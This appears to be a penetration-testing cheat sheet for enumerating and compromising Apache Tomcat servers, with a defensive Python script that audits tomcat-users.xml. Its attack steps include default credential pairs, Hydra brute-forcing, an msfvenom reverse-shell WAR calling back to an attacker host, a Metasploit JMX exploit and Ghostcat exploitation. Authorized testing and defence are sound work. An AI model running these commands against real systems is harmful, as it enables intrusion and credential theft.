7. Tomcat Discovery and Enumeration

1. Tomcat Version Detection

Methods:

  • HTTP Server Header:

    curl -I http://target:port/ | grep -i "Server"
    • Check if the "Server" header reveals the Tomcat version.

  • /docs Page:

    curl -s http://target:port/docs/ | grep -i "Apache Tomcat"
    • The default documentation page may disclose the version.

  • Error Pages:

    curl -s http://target:port/nonexistentpage
    • Sometimes, error pages leak version information.

  • Specific File Checks:

    • If access is gained, check JAR files in /lib directory.

    • Version-specific vulnerabilities may relate to these files.


2. Tomcat Directory Structure (Key Files)

  • /bin - Executable scripts.

  • /conf/tomcat-users.xml - Stores user credentials and roles.

  • /conf/web.xml - Defines web application routes and configurations.

  • /webapps/ - Web application deployment directory.


3. Manager Application Enumeration

Directory Brute-forcing:

  • Using Gobuster:

    gobuster dir -u http://target:port/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  • Using Wfuzz:

    wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://target:port/FUZZ
  • Look for /manager and /host-manager paths.

Authentication Checks:

  • Default Credentials:

    tomcat:tomcat
    admin:admin
    tomcat:password
    role1:role1
    role:changeme
  • Brute-forcing Credentials:

    hydra -l tomcat -P /usr/share/wordlists/rockyou.txt target http-get /manager/html
  • If access is gained, check for application deployment, undeployment, and management functionalities.


4. Tomcat Credential Enumeration

tomcat-users.xml Enumeration:

  • Local File Inclusion (LFI) to read credentials:

    cat /conf/tomcat-users.xml
    (Path is relative to the Tomcat installation directory, i.e. $CATALINA_HOME.)
  • Check for plaintext usernames and passwords.
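
An added example (not part of this cheat sheet) that audits a tomcat-users.xml document for the weaknesses this section and section 3 describe: the default credential pairs listed above, plaintext passwords, and users holding /manager or /host-manager roles. The sample XML is constructed, and the plaintext-vs-digest check is a heuristic assumption.

```python
import xml.etree.ElementTree as ET

# Default credential pairs listed in this cheat sheet (section 3)
DEFAULT_CREDS = {("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "password"),
                 ("role1", "role1"), ("role", "changeme")}
# Roles that grant access to /manager or /host-manager
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

def _local(tag):
    """Strip the XML namespace so <user> matches with or without xmlns."""
    return tag.rsplit("}", 1)[-1]

def _looks_hashed(pw):
    # Assumption (heuristic): salted digests are stored as salt$iterations$hash,
    # unsalted ones as a bare hex digest; anything else is treated as plaintext.
    if "$" in pw:
        return True
    return len(pw) >= 32 and all(c in "0123456789abcdefABCDEF" for c in pw)

def audit_tomcat_users(xml_text):
    """Return a list of (username, finding) tuples for every weakness found."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        # Tomcat accepts both username= and the legacy name= attribute
        user = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (user, password) in DEFAULT_CREDS:
            findings.append((user, "default credentials"))
        if password and not _looks_hashed(password):
            findings.append((user, "plaintext password"))
        for role in sorted(roles & PRIVILEGED_ROLES):
            findings.append((user, f"privileged role {role}"))
    return findings

# Constructed sample, not taken from any real deployment
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,tomcat"/>
  <user username="deploy" password="c0ffee1234$1$9a8b7c6d5e4f" roles="manager-script"/>
  <user username="viewer" password="s3cret-but-plain" roles="tomcat"/>
</tomcat-users>"""

if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE):
        print(f"{user}: {issue}")
```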

web.xml Enumeration:

  • Identify application endpoints:

    cat /webapps/[app]/WEB-INF/web.xml
  • Useful for mapping application routes and identifying potential attack vectors.


5. WAR File Upload (Remote Code Execution)

  • After authentication to /manager:

    • Upload a malicious WAR file containing a JSP web shell.

  • Create JSP reverse shell:

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourIP LPORT=yourPort -f war > shell.war
  • Deploy via Manager interface and access via browser:

    http://target:port/shell.jsp

6. JMX Enumeration & Exploitation

Using jmxterm:

java -jar jmxterm-1.0-alpha-4-uber.jar --url service:jmx:rmi:///jndi/rmi://target:port/jmxrmi
  • Explore MBeans and their attributes/operations.

Using Metasploit:

use exploit/multi/misc/java_jmx_server
set RHOST target
set RPORT 1099
run
  • JMX can expose sensitive information and allow for RCE.


7. Connector Enumeration

AJP Connector:

  • Check if AJP is enabled (Default: Port 8009):

    nmap -p 8009 --script ajp-headers target
  • Exploit AJP using Ghostcat (CVE-2020-1938):

    python3 ghostcat.py -u target:8009
  • AJP misconfigurations can lead to sensitive file disclosure or code execution.


8. Web Application Enumeration

Directory & File Enumeration:

  • Enumerate web applications in /webapps/ directory:

    gobuster dir -u http://target:port/webapps/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  • Find JSP files and servlets:

    wfuzz -c -z file,/usr/share/wordlists/extensions_common.txt --hc 404 http://target:port/FUZZ.jsp

Parameter Fuzzing:

  • Fuzz application parameters for vulnerabilities:

    ffuf -u http://target:port/index.php?FUZZ=value -w /usr/share/wordlists/parameters.txt

9. Configuration File Enumeration

  • Identify sensitive configuration files:

    • catalina.properties

    • server.xml

    • context.xml

  • Extract credentials, ports, and security settings.


10. CVE Enumeration & Exploitation

  • Identify version-specific vulnerabilities:

    searchsploit tomcat [version]
  • Public exploits for Tomcat:

    exploitdb -s tomcat

Important Considerations

  • Least Privilege: Use minimal required privileges during enumeration.

  • Target Scope: Stay within the defined scope of the penetration test.

  • Documentation: Record all findings and methodologies.

  • Client Communication: Keep the client informed of critical discoveries.

  • Clean Up: Remove temporary files and restore original configurations if testing in an authorized environment.


Summary of Key Findings

  • Server Header & Docs: Identify Tomcat version.

  • tomcat-users.xml: Extract credentials and roles.

  • web.xml: Map routes and servlets.

  • /manager & /host-manager: Manage applications.

  • WAR File Upload: Achieve RCE.

  • JMX Exposure: Possible RCE and data leaks.

  • AJP Connector: Check for misconfigurations.

  • Common CVEs: Search for known exploits.
